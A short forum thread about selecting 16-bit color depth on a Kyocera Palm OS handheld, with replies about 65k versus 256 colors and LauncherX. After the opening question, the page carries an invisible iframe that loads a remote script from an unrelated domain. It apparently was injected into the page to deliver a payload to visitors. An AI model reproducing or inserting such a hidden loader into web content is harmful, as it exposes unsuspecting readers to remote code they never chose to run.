How to set screen depth

The kyocera spec sheet said 35,000 colors but I only get 256 in Launcher.

Does anybody know where I can select screen depth in the palm os?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Isn't it actually 65,000 colors?

I think so. You may want to get an app that allows you to set the resolution (I use LauncherX now, which does that for you). However, generally, each program will set its own color depth.

Yes, 65k colors. Most applicatiosn only support 256 colors (8-bit) as many Palm icons will not be displayed properly in anything higher. The 65k colors are for viewing pictures and watching videos. Even Silverscreen warns of setting it to anything higher than 256 colors, but I did it anyway and it's running at 16-bit
